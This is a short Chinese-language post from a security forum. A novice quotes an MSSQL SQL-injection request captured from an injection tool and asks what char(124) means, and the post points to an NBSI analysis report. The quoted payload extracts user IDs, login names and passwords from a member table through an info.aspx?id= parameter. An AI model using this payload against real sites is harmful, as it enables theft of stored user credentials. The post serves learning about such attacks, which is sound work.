议题作者：寂寞520
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

        最近想学习SQL注入，于是抓包看看前辈们的注入语句，我用WinSock Expert截取了明小子注入工具的发送代码，只看懂一部分，好头大哦！%2B我知道是+ 号，但是char(124)这种是什么意思啊？我百度没搜索到，哪位大大帮忙给菜鸟解释下好吗？

info.aspx?id=111 And char(124)%2B(Select Top 1 isNull(cast([USERID] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Loging] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PASS] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 2 [USERID],[Loging],[PASS] From [Lily]..[member] Where 1=1 Order by [USERID],[Loging],[PASS]) T Order by [USERID] desc,[Loging] desc,[PASS] desc)>0

NBSI 注入分析跟踪报告(MSSQL篇)

百度一下，这个分析的比较好